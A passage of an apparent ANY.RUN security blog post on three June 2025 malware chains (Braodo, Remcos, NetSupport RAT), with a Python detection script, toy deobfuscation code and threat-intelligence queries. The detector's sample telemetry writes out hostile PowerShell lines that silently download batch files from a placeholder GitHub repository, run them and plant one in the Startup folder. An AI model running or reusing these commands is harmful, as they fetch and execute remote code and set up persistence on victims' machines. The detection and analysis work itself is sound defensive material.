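    "png_masquerade": re.compile(r"\.png\b.*%temp%[^\s'\"]*\.bat", re.I),
    "tls12_forced": re.compile(r"\bTls1\.?2\b", re.I),
    "startup_persistence": re.compile(r"\\Startup\\", re.I),
    "python_from_public": re.compile(r"python(\.exe)?\s+\S*\\Users\\Public\\", re.I),
}


def stage_hits(ev):
    """Names of the stages whose pattern matches this event's command line."""
    return {name for name, rx in STAGES.items() if rx.search(ev.cmdline)}


def ancestors(events, pid):
    """Yield the event for pid, then its parent, grandparent, ... (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid].ppid


def find_chain(events):
    """Stages seen along the ancestry of any python.exe started from Public.
    Walking parents ties the stages together, so the same indicators scattered
    across unrelated processes do not add up to one chain."""
    best = set()
    for ev in events:
        if "python_from_public" in stage_hits(ev):
            stages = set()
            for ancestor in ancestors(events, ev.pid):
                stages |= stage_hits(ancestor)
            if len(stages) > len(best):
                best = stages
    return best


def is_braodo_like(events):
    """Minimum evidence: hidden PowerShell, a GitHub fetch and python from Public, linked."""
    return {"hidden_powershell", "github_download", "python_from_public"} <= find_chain(events)


# Constructed sample telemetry mirroring the chain (placeholder repository paths).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "C:\\Users\\u\\Downloads\\invoice.bat"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -WindowStyle Hidden -Command "
              "(New-Object Net.WebClient).DownloadFile('https://github.com/example/repo/raw/main/pic.png',"
              "'%temp%\\s2.bat'); & '%temp%\\s2.bat'"),
    ProcEvent(400, 300, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "%temp%\\s2.bat"'),
    ProcEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -c "
              "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;"
              " iwr https://raw.githubusercontent.com/example/repo/main/s.bat"
              " -OutFile \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\s.bat\";"
              " iwr https://raw.githubusercontent.com/example/repo/main/p.zip -OutFile C:\\Users\\Public\\p.zip"),
    ProcEvent(600, 500, r"C:\Users\Public\python\python.exe", "python.exe C:\\Users\\Public\\main.py"),
]

# Same final indicator, but launched from explorer with no staging above it.
BENIGN_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(700, 100, r"C:\Users\Public\python\python.exe", "python.exe C:\\Users\\Public\\tool.py"),
]

if __name__ == "__main__":
    print(sorted(find_chain(SAMPLE_EVENTS)), is_braodo_like(SAMPLE_EVENTS))
    print(sorted(find_chain(BENIGN_EVENTS)), is_braodo_like(BENIGN_EVENTS))
```

The point of `find_chain` is the ancestry walk: a lone python.exe in Public, or a lone hidden PowerShell, is noise in many environments, while three of the described stages linked by parent-child relationships is the campaign’s shape.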

ANY.RUN’s Threat Intelligence Lookup allows analysts to discover recent Braodo attacks and fresh samples of this stealer dissected by the users of the Interactive Sandbox. Search by the malware’s name and view analyses:  
 
threatName:"Braodo"

Braodo analyses in the Sandbox found via Threat Intelligence Lookup 

The search results contain a selection of Braodo samples recently analyzed by Sandbox users. Each analysis session can be explored in depth to harvest IOCs and observe the malware’s behavior.

2. Control Flow Flattening Obfuscated JavaScript Drops Remcos 

Original post on X and LinkedIn 

Another tricky piece of malicious JavaScript has been observed using a technique called control-flow flattening obfuscation to covertly deliver Remcos malware. The JS contains multiple self-invoking functions that loop over arrays of strings and numbers in a while(!![]) loop until a calculated checksum matches a predefined value. This obfuscation technique forces static analyzers to work through the array’s content instead of returning the required string directly.
 
ANY.RUN’s Script Tracer enables easy analysis of heavily obfuscated scripts by logging their execution in real time, with no need for manual deobfuscation. 

View analysis 

A Remcos malware sample including the obfuscated JavaScript

The script: 

  • Invokes PowerShell via ActiveXObject("WScript.Shell") with parameters;
  • Creates a System.Net.WebClient object;
  • Specifies the URL to download the binary;
  • Downloads the binary data and passes it to MSBuild;
  • Downloads and executes the Remcos malware module.

The script’s architecture and behavior exposed in ANY.RUN’s sandbox
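To make the control-flow-flattening pattern concrete, here is an added toy example in Python (not the malicious script and not ANY.RUN code): a table of string fragments is rotated in a while loop until a checksum matches a fixed target, and a flattened dispatcher then assembles the names it needs by index, so the block order lives in data rather than in the code’s syntax. The tracer wraps the table so every lookup is logged while the code runs, which is the same idea as letting Script Tracer record execution instead of deobfuscating statically. The fragment table, checksum function and dispatcher order are constructed for the illustration.

```python
"""Added illustration of control-flow flattening plus dynamic tracing.
Toy code, not the malicious script and not ANY.RUN code: the fragment
table, checksum and dispatcher order are constructed."""

# Fragment table as a static reader sees it: deliberately rotated (constructed;
# the real scripts hold hundreds of entries).
SCRAMBLED = ["System.", "Net.WebClient", "WScript.", "Shell"]
TARGET = 91  # checksum of the correct order, fixed by the "obfuscator"


def checksum(table):
    """Position-weighted length sum; every rotation of SCRAMBLED gives a different value."""
    return sum((i + 1) * len(s) for i, s in enumerate(table)) % 1000


def unscramble(table, target):
    """The while(!![]) idiom: rotate until the checksum matches, then stop."""
    table = list(table)
    while True:
        if checksum(table) == target:
            return table
        table.append(table.pop(0))


class TracedTable(list):
    """Behaves like the list, but every index access is recorded in `log`."""

    def __init__(self, items, log):
        super().__init__(items)
        self.log = log

    def __getitem__(self, index):
        value = super().__getitem__(index)
        self.log.append((index, value))
        return value


def flattened_payload(table):
    """Flattened control flow: the block sequence is the string '2|0|1|3'."""
    order = "2|0|1|3".split("|")
    out, step = [], 0
    while True:
        block = order[step]
        step += 1
        if block == "2":        # init
            out = []
        elif block == "0":      # assemble first name from two fragments
            out.append(table[0] + table[1])
        elif block == "1":      # assemble second name
            out.append(table[2] + table[3])
        elif block == "3":      # exit
            return out


def trace_resolved_strings():
    """Run the flattened code and return (names it built, ordered lookup log)."""
    log = []
    table = TracedTable(unscramble(SCRAMBLED, TARGET), log)
    names = flattened_payload(table)
    return names, log


if __name__ == "__main__":
    names, log = trace_resolved_strings()
    for index, value in log:
        print(f"lookup table[{index}] -> {value!r}")
    print("resolved:", names)
```

A static tool has to reproduce the rotation and the checksum before it can tell what `table[0]` means; the traced run simply reports the lookups in the order the code made them, which is why the write-up leans on execution logging for this family of scripts.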

PowerShell-abusing script attacks are becoming more widespread and sophisticated. It is extremely important for threat hunters to be able to investigate and analyze such attacks, and to see which malware families and threat actors are using them, and how.

A guest article by Clandestine, threat hunter and researcher, was recently published on our blog, highlighting a number of advanced tips for leveraging Threat Intelligence Lookup for malware data gathering and analysis (a guide to the main TI Lookup features and their use is included, so we recommend reading it and taking note).

Clandestine demonstrates how one can find malware samples that use scripting languages to hide malicious code or execute obfuscated commands:  

commandLine:"powershell" and fileExtension:"js"

JavaScript files executing PowerShell commands 

This query identifies scripts that run system commands, a pattern commonly observed in multi-stage attacks where script files act as initial droppers that subsequently execute obfuscated PowerShell commands.
 
The combination of file extension parameters (you can search for other script types like Visual Basic Script (.vbs) files) with command-line indicators helps security analysts identify and analyze this obfuscation technique. 


ANY.RUN cloud interactive sandbox interface

Learn to Track Emerging Cyber Threats

Check out expert guide to collecting intelligence on emerging threats with TI Lookup



3. Obfuscated BAT file used to deliver NetSupport RAT  

Original post on X and LinkedIn 

Cybercriminals continue to rely on BAT files (batch scripts) to sneak malware into systems and evade detection. The ANY.RUN team has studied one such case where an obfuscated BAT file was used to deliver the NetSupport Remote Access Trojan (RAT), a tool originally designed for remote IT support but now abused by attackers to gain full control over victims’ machines.

View analysis 

Sandbox analysis of a NetSupport attack abusing PowerShell

The key execution chain stages are:

  • Cmd.exe runs an obfuscated BAT file which launches PowerShell scripts.
  • PowerShell downloads and executes client32.exe, the NetSupport client.
  • The malware uses the client32 process to run NetSupport RAT and adds it to autorun in the registry via reg.exe.
  • Creates an ‘Options’ folder in %APPDATA% if missing.
  • The NetSupport client downloads a task .zip file, extracts it, and runs it from %APPDATA%\Application.zip.
  • Deletes the ZIP files after execution.

ANY.RUN’s Sandbox Process Graph showing NetSupport penetrating the network

Options folder created, .zip archive delivered: Script Tracer in the Sandbox

As attackers develop new ways to penetrate networks and evade detection, threat hunting becomes more challenging and demands keeping up with trends to stay ahead of possible disasters.

Threat Intelligence Lookup allows you to search for small, seemingly benign artifacts on the network that can be traces of malicious activity, such as a script run from the command line creating a folder in the AppData\Roaming directory:
 
commandLine:"AppData\Roaming\Options"

A number of NetSupport RAT samples found via the folder they create on the endpoint

With the commandLine search parameter, you can find malware samples based on any script artifacts found in system logs, for example registry key changes.
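The three queries on this page (threatName:"Braodo", commandLine:"powershell" and fileExtension:"js", and commandLine:"AppData\Roaming\Options") share one surface syntax: quoted field:"value" terms joined by and/or. The following added example, which is not ANY.RUN code and not the real TI Lookup engine, implements just that syntax as a small evaluator and runs the page’s queries over a handful of constructed sandbox-style records, so the matching logic (case-insensitive substring per field, AND within a group, OR across groups) can be seen end to end. The record field names follow the queries; their values are made up.

```python
"""Added example: a small evaluator for the field:"value" query syntax used
on this page, run over constructed records. Not ANY.RUN code and not the real
TI Lookup engine; it reproduces only the surface form of the page's queries."""
import re

# Constructed records (field names follow the page's queries; values are made up).
RECORDS = [
    {"threatName": "Braodo", "fileExtension": "bat",
     "commandLine": "powershell.exe -WindowStyle Hidden -Command ..."},
    {"threatName": "Remcos", "fileExtension": "js",
     "commandLine": "powershell.exe -ep bypass -c ..."},
    {"threatName": "NetSupport", "fileExtension": "bat",
     "commandLine": "cmd.exe /c mkdir C:\\Users\\u\\AppData\\Roaming\\Options"},
    {"threatName": "Remcos", "fileExtension": "vbs",
     "commandLine": "powershell.exe -nop -w 1 ..."},
    {"threatName": "Braodo", "fileExtension": "bat",
     "commandLine": "python.exe C:\\Users\\Public\\main.py"},
]

# A quoted term is matched as a whole first, so and/or inside quotes never splits a value.
TOKEN = re.compile(r'(\w+):"([^"]*)"|\b(and|or)\b', re.I)


def parse_query(query):
    """Parse into OR-groups of AND-terms; raises ValueError on malformed input."""
    groups, current, pos = [], [], 0
    for m in TOKEN.finditer(query):
        if query[pos:m.start()].strip():
            raise ValueError(f"unexpected text near {query[pos:m.start()]!r}")
        pos = m.end()
        field, value, op = m.groups()
        if op is None:
            current.append((field, value))
        elif op.lower() == "or":
            if not current:
                raise ValueError("dangling 'or'")
            groups.append(current)
            current = []
        # 'and' simply continues the current group
    if query[pos:].strip() or not current:
        raise ValueError("incomplete query")
    groups.append(current)
    return groups


def record_matches(record, groups):
    """Case-insensitive substring match per term; AND within a group, OR across groups."""
    return any(
        all(value.lower() in str(record.get(field, "")).lower() for field, value in group)
        for group in groups
    )


def search(query, records=RECORDS):
    """Return the records matching the query, in their original order."""
    groups = parse_query(query)
    return [r for r in records if record_matches(r, groups)]


if __name__ == "__main__":
    for q in ('threatName:"Braodo"',
              'commandLine:"powershell" and fileExtension:"js"',
              r'commandLine:"AppData\Roaming\Options"'):
        print(q, "->", [r["threatName"] for r in search(q)])
```

The useful property to notice is in the second query: a commandLine term alone would also return the .bat and .vbs records that spawn PowerShell, and it is the fileExtension term that narrows the result to JavaScript droppers, which is exactly the combination the guest article recommends.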

How TI Lookup Benefits SOC 

ANY.RUN’s Threat Intelligence Lookup is a critical ally for security teams facing an ever-growing variety of evasive malware. With attackers increasingly relying on multi-stage scripts, living-off-the-land binaries (LOLBins), and public infrastructure like GitHub, traditional indicators often go unnoticed.  

With Threat Intelligence Lookup your team can:  

  • Speed up threat investigations by letting analysts quickly pivot from indicators and suspicious behaviors to related malware samples and campaigns. 
  • Shorten response times by providing contextual threat insights essential for fast, informed security decisions. 
  • Enhance alert triage by prioritizing detections based on real-world behavior and threat prevalence. 
  • Support proactive threat hunting through flexible search queries that uncover evolving obfuscation and delivery techniques. 
  • Improve detection coverage by uncovering patterns like scripting abuse, LOLBins, and infrastructure used in multi-stage attacks. 

The cyber incidents in June 2025 underscore a clear trend: adversaries are refining their methods with obfuscation, open-source abuse, and layered execution chains. To combat these threats effectively, security teams need both visibility and context. Our Interactive Sandbox and TI Lookup empower analysts to deconstruct complex attacks and proactively hunt emerging threats before they become breaches. 

About ANY.RUN 

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.   

With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premises systems. Combined with TI Lookup, YARA Search, and TI Feeds, we equip businesses to speed up investigations, reduce security risks, and improve team efficiency.

The post Top 3 Cyber Attacks in June 2025: GitHub Abuse, Control Flow Flattening, and More appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More